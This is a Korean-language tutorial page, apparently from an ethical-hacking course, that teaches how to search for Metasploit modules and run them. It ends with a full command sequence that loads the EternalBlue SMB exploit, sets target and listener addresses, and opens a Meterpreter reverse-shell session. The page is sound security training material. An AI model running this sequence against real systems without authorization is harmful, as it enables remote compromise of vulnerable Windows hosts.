0Pricing
Ethical Hacking Academy · 강의

익스플로잇 검색 및 사용

찾아서 실행하기

익스플로잇 검색 및 사용은(는) CoddyKit의 무료 Ethical Hacking Academy 강의입니다. 이것은 4개 중 2번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Ethical Hacking Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Ethical Hacking Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

정찰에서 익스플로잇까지

스캔을 마치면 대상의 서비스와 버전을 알 수 있습니다. 다음 단계는 해당 버전의 알려진 취약점과 일치하는 익스플로잇 모듈을 찾는 것입니다.

Metasploit의 search 명령은 수천 개의 모듈로 이어지는 관문입니다. 정확하게 검색하면 시간을 절약하고 잘못된 코드를 실행하는 일을 피할 수 있습니다.

기본 검색

search 명령은 키워드로 모듈 색인을 조회합니다. 소프트웨어 이름, CVE 또는 서비스로 검색할 수 있습니다.

search eternalblue
search type:exploit platform:windows smb

검색 필터

다음 필터로 결과를 구체화할 수 있습니다.

  • type: exploit, auxiliary, post
  • platform: windows, linux, unix
  • cve: 특정 CVE 식별자
  • rank: excellent, great, good (신뢰성)

필터를 조합하면 수천 개의 모듈을 소수의 결과로 빠르게 좁힐 수 있습니다.

search cve:2017-0144 type:exploit

검색 결과 읽기

검색 결과에는 각 모듈의 rank, 공개 날짜, check 표시가 나열됩니다. rank는 익스플로잇의 신뢰성과 안전성을 나타냅니다.

  • excellent: 대상을 중단시킬 가능성이 낮습니다.
  • great/good: 일반적인 조건에서 신뢰할 수 있습니다.
  • low/manual: 위험하거나 신중한 설정이 필요합니다.

운영 중인 시스템의 중단을 피하려면 rank가 높은 모듈을 우선 사용하십시오.

모듈 불러오기

모듈의 인덱스 번호나 전체 경로를 use와 함께 사용합니다. 프롬프트가 변경되어 불러온 모듈을 표시하고, 이제 데이터 저장소에 해당 모듈의 옵션이 저장됩니다.

use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >

모듈 살펴보기

실행하기 전에 모듈에 대해 읽어 보십시오. info는 설명, 참조 정보(CVE 및 권고문), 필수 옵션, 지원되는 대상을 표시합니다.

모듈의 작동 방식을 이해하는 것은 전문적이고 책임감 있게 사용하기 위한 과정입니다. 이해하지 못한 익스플로잇은 절대 실행하지 마십시오.

info
show options
show targets

옵션 설정하기

set으로 필수 옵션을 구성합니다. 원격 익스플로잇에서 일반적으로 설정하는 항목은 대상 주소와 페이로드 설정입니다.

set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2

check 명령

많은 익스플로잇은 check를 지원합니다. 이 명령은 실제로 익스플로잇을 수행하지 않고도 대상이 취약한 것으로 보이는지 안전하게 검사합니다.

먼저 check를 실행하는 것은 좋은 실무 방식입니다. 시스템이 중단될 위험을 줄이고, 실제 가능성에 노력을 들이려는 것인지 확인할 수 있습니다.

check
# [+] 10.10.10.40:445 - The target is vulnerable.

페이로드 선택하기

익스플로잇에는 페이로드가 필요합니다. 메타스플로이트가 기본값을 선택하지만, 대상과 필요한 접근 수준에 맞는 페이로드를 나열하고 선택할 수 있습니다.

show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp

실행 및 세션

exploit(또는 run)으로 실행합니다. 성공하면 대상에 대한 대화형 연결인 세션을 얻습니다.

sessions -l로 여러 세션을 나열하고, sessions -i N으로 상호 작용할 수 있습니다. background로 세션을 백그라운드로 보내면 콘솔에서 계속 작업할 수 있습니다.

exploit
sessions -l
sessions -i 1

전역 옵션과 모듈 옵션

LHOST와 같은 일부 설정은 여러 모듈에서 재사용됩니다. setg로 전역 설정하면 모듈을 전환할 때마다 다시 입력하지 않아도 됩니다.

  • set: 현재 모듈에만 적용됩니다.
  • setg: 모듈 전체에 전역적으로 적용됩니다.
  • unsetg: 전역 값을 삭제합니다.

여러 모듈을 사용하는 장시간 작업에서 시간을 절약할 수 있습니다.

setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40

빠른 확인

익스플로잇을 실행하기 전에 책임감 있게 수행해야 할 단계를 고르십시오.

복습

익스플로잇을 찾고 실행하는 방법을 배웠습니다.

  • 필터(type, platform, cve, rank)를 사용한 search로 모듈을 찾습니다.
  • 신뢰성과 안전성이 더 높은 rank의 모듈을 우선 사용합니다.
  • use로 불러오고, info/show options로 살펴본 다음, set으로 구성합니다.
  • 먼저 check를 실행한 다음 exploit으로 세션을 확보합니다.
  • sessions -l/-i로 세션을 관리합니다.

다음 주제: 페이로드와 익스플로잇 후 작업 셸인 미터프리터

자주 묻는 질문

“익스플로잇 검색 및 사용” 강의는 무료인가요?

네 — “익스플로잇 검색 및 사용” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Ethical Hacking Academy 강의 전체를 잠금 해제할 수 있습니다. Ethical Hacking Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

“익스플로잇 검색 및 사용”에서 뭘 배우나요?

찾아서 실행하기 브라우저에서 직접 실행하는 실습 코드로 Ethical Hacking Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.

Ethical Hacking Academy을(를) 시작하는 데 경험이 필요한가요?

사전 경험은 필요하지 않습니다. CoddyKit의 Ethical Hacking Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 2번째 강의입니다.

“익스플로잇 검색 및 사용” 강의는 얼마나 걸리나요?

대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.

이 Ethical Hacking Academy 강의에서 코드를 작성하고 실행할 수 있나요?

네. 모든 Ethical Hacking Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.

이 강의의 모든 강의

  1. Metasploit 아키텍처
  2. 익스플로잇 검색 및 사용
  3. 페이로드와 Meterpreter
  4. 침투 후 모듈
← Ethical Hacking Academy(으)로 돌아가기